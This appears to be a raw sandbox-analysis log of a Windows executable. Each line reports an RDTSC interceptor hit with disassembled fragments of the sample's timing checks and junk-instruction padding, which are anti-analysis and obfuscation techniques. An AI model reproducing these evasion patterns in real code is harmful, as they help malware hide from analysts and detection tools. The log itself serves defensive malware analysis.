Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D5CC7 second address: 11D5CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007EFFE8794FA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D5CD1 second address: 11D5CE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007EFFE92369D0h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D5F6F second address: 11D5F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFE8794FB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D5F87 second address: 11D5F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D5F8D second address: 11D5FA1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jne 00007EFFE8794FA6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D5FA1 second address: 11D5FA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D5FA5 second address: 11D5FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D60F9 second address: 11D6111 instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFFE92369D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D6111 second address: 11D6115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D570A second address: 11D570E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D640C second address: 11D6410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D6593 second address: 11D65AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jl 00007EFFE92369C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007EFFE92369C6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D65AA second address: 11D65AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D66FC second address: 11D672C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007EFFE92369D5h 0x0000000b jmp 00007EFFE92369D4h 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D69E2 second address: 11D69EC instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFFE8794FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11DB74A second address: 11DB754 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFFE92369CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 116035F second address: 1160363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11DE377 second address: 11DE38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007EFFE92369D1h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11DDDC5 second address: 11DDDDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FADh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jbe 00007EFFE8794FA6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11DDF23 second address: 11DDF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007EFFE92369C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11DE086 second address: 11DE08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11DE08E second address: 11DE093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11DE093 second address: 11DE099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11E047A second address: 11E0485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11E7E19 second address: 11E7E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFE8794FB8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11E7E37 second address: 11E7E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007EFFE92369CEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11E7E44 second address: 11E7E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11E7E4A second address: 11E7E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11E693D second address: 11E6947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11E6D4A second address: 11E6D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11996A9 second address: 119972D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007EFFE8794FAEh 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D3537h], ecx 0x00000017 mov ebx, dword ptr [ebp+124897D8h] 0x0000001d mov ecx, dword ptr [ebp+122D390Bh] 0x00000023 add eax, ebx 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007EFFE8794FA8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f jmp 00007EFFE8794FACh 0x00000044 jmp 00007EFFE8794FB4h 0x00000049 push eax 0x0000004a pushad 0x0000004b jg 00007EFFE8794FACh 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119972D second address: 1199797 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFFE92369C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007EFFE92369C8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D1BBCh], esi 0x0000002e push 00000004h 0x00000030 xor dword ptr [ebp+122D33D7h], esi 0x00000036 nop 0x00000037 pushad 0x00000038 jnl 00007EFFE92369CCh 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 push ecx 0x00000042 pop ecx 0x00000043 popad 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007EFFE92369D5h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11EAE12 second address: 11EAE20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007EFFE8794FA8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11EAE20 second address: 11EAE2F instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFFE92369C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11EAF90 second address: 11EAF94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11EAF94 second address: 11EAFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFFE92369D0h 0x0000000d push edi 0x0000000e jmp 00007EFFE92369CCh 0x00000013 jmp 00007EFFE92369CCh 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007EFFE92369D4h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F6D84 second address: 11F6D8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F6D8B second address: 11F6DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFFE92369D3h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F6DAD second address: 11F6DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F4E42 second address: 11F4E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F4FF7 second address: 11F5003 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFFE8794FA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F5003 second address: 11F5025 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007EFFE92369C6h 0x00000009 jmp 00007EFFE92369D3h 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F642B second address: 11F6431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F6431 second address: 11F6451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007EFFE92369D8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F6451 second address: 11F6456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F6456 second address: 11F646E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007EFFE92369C6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F6788 second address: 11F678C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F678C second address: 11F6790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F6790 second address: 11F67AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007EFFE8794FAFh 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F6A6A second address: 11F6A76 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFFE92369C6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11FA8A7 second address: 11FA8C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11FA8C3 second address: 11FA8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11FA8C9 second address: 11FA8CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11FA8CD second address: 11FA8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007EFFE92369C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F9D03 second address: 11F9D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFE8794FB3h 0x00000009 popad 0x0000000a jmp 00007EFFE8794FB0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F9D2B second address: 11F9D40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F9D40 second address: 11F9D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11F9E80 second address: 11F9E88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11FA137 second address: 11FA14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007EFFE8794FB1h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11FA14F second address: 11FA159 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFFE92369D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11FA159 second address: 11FA15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11FA58F second address: 11FA597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11FA597 second address: 11FA59B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11FED76 second address: 11FED97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFE92369D8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11FED97 second address: 11FED9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1163803 second address: 116380D instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFFE92369CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 12084CD second address: 12084D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 12084D1 second address: 12084E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007EFFE92369CAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 12084E5 second address: 12084EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 12084EB second address: 12084EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1157EC3 second address: 1157EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1157EC7 second address: 1157ECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1157ECB second address: 1157ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1206688 second address: 12066D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFE92369D5h 0x00000009 pop esi 0x0000000a pushad 0x0000000b jmp 00007EFFE92369CFh 0x00000010 jmp 00007EFFE92369D9h 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1206846 second address: 120684C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 120684C second address: 1206858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007EFFE92369C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1206858 second address: 120688E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jno 00007EFFE8794FB8h 0x0000000d push edi 0x0000000e jmp 00007EFFE8794FB4h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1206BCD second address: 1206BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1206BD3 second address: 1206BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007EFFE8794FA6h 0x0000000d jo 00007EFFE8794FA6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1206BE6 second address: 1206BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 12072AB second address: 12072C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1207564 second address: 1207576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFFE92369CDh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1207576 second address: 12075A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007EFFE8794FB7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFFE8794FAEh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1207CDB second address: 1207CE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1207CE0 second address: 1207CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 120836A second address: 1208370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1208370 second address: 1208375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 12061DA second address: 12061F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007EFFE92369D8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 120EB17 second address: 120EB21 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFFE8794FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1211226 second address: 121122A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 121122A second address: 1211230 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 121671C second address: 121672A instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFFE92369C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 121B1B0 second address: 121B1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
